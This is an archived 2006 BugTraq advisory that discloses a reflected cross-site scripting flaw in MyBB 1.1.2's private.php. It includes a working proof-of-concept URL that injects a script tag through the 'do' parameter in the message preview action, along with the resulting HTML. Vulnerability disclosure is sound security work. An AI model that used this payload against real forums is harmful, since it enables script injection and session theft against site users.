BugTraq
MyBB 1.1.2 New XSS Jun 06 2006 07:21AM
o y 6 hotmail com
// MyBB 1.1.2 New XSS

File :- private.php

Ver. :- $do = $mybb->input['do'];

Line :- 260

Action :- Preview

HTTP Proof :-

/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=adva
nced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&a
ction=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E
&preview=Preview

// Code

<input type="hidden" name="do" value="D3vil-0x1"><script>alert(1);</script>" />

//

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus